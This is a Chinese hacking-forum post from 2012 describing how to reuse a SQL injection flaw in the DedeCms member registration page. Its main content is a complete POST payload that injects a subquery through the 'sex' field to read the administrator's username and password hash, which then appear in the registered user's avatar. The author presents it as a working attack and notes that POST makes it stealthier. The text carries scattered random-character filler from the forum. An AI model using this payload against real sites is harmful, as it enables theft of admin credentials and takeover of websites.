找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2247|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 20121122! ~5 h* v* p$ C; T  ^

- t, X7 B$ A- s5 r需要magic_quotes_gpc=Off' W5 ^+ O" `8 q4 w( d5 z) l' D
( _( L. f1 L1 b8 H
应该是没有什么大危害的漏洞.  M1 O9 b) [+ V2 D" t8 Z" o# @
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.6 ^/ Y4 Y7 N9 Z7 V

$ K" E6 P: O9 R( `是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.0 ~; H5 k/ }; w2 o
POST提交以下数据,其实不用POST提交的,这样隐蔽点.% g" d4 Z6 j$ D" ~0 k
, O( X6 N: D  I% L  ]7 v4 t0 C! `
http:///de/member/reg_new.php$ N; `$ P. O, W$ u7 |

. e8 i! H  d0 O6 }: nPOST
) W9 l7 W" E" I
. w+ c( c+ M; W9 n0 ^+ Hdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=$ ~' a/ R" ~' B0 ~

) d0 P/ f0 @/ ^; \" E+ r5 V6 @+ U7 D: a成功注册后,头像处里面有好玩的信息.
0 u; E, w9 ^3 `# Q
/ t0 m/ ?2 s; Y. q9 F0 K% C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表